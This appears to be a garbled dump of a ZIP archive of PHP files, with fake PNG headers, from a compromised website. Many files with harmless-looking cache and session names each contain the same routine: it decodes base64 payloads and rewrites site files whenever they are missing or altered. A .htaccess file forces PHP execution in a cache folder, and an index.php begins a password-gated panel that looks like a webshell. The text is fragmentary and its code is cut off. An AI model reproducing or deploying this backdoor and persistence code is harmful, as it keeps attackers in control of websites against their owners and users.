🍲dfcv🏰dd⋉(● ∸ ●)⋊@% PNG %k25u25%fgd5n! PNG %k25u25%fgd5n!PK P]6 0 cache/context-loader.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]6 0 cache/meta-cache.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]6 0 cache/init-cache.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]6 0 cache/session-manifest.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]6 0 cache/handler-loader.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]6 0 cache/widget-cache.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]lS[ [ cache/sessions/.htaccessnu [
Require all granted
SetHandler application/x-httpd-php
PK P]̈́ cache/sessions/init-cache.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]t( cache/sessions/session-init.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]̈́ cache/sessions/init-loader.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]t( ! cache/sessions/manifest-cache.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]̈́ cache/sessions/widget-cache.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]̈́ cache/sessions/index-cache.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]t( ! cache/sessions/runtime-loader.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]t( cache/sessions/meta-cache.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]t( " cache/sessions/manifest-loader.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]t( " cache/sessions/session-session.phpnu [ $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>PK P]v8s s cache/sessions/meta-loader.phpnu [ ';
}
PK P]W ext854c2c/index.phpnu [ SESSION_TIMEOUT)) {
session_unset();
session_destroy();
return false;
}
$_SESSION['last_activity'] = time();
return true;
}
// Handle login form submission
function handleLogin() {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
if ($_POST['password'] === PASSWORD) {
$_SESSION['logged_in'] = true;
$_SESSION['last_activity'] = time();
return true;
} else {
echo "
Incorrect password!
";
return false;
}
}
return false;
}
// Display login form
function showLoginForm() {
echo '
Login Required
Login Required